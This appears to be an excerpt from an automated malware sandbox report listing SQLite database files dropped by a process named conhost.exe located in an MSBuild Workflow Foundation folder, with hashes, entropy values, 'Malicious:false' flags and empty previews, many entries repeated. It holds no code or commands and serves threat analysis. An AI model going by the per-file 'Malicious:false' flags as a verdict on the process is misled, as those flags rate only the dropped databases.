                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
